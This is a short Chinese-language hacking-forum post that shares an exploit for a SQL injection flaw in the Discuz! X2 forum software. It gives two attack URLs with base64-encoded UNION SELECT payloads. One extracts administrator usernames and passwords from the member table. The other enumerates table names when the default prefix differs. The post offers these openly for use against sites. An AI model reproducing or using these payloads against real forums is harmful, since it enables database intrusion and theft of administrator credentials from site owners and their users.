Discuz! X2最新注入漏洞EXP 作者:hack1990 时间:11-06-29 阅读数:1362人阅读 昨天乌云公布出来Discuz! X2的0day,但是没公布利用方法。今天俺拿到了,分享给大家。而且是直接暴管理员用户和密码的EXP:http://www.xx.com/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGlrZSAnYWRtaW58eHx5%3D要是上面的EXP暴不出来,可以改了表前缀。可以试下这个:http://www.xx.com/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D # Nmap Security Scanner 7.0 上一篇:突破sql注入过滤union SELECT继续注射 下一篇:公布一个 Nuclear-Blog v4.0 留言板的 XSS 漏洞
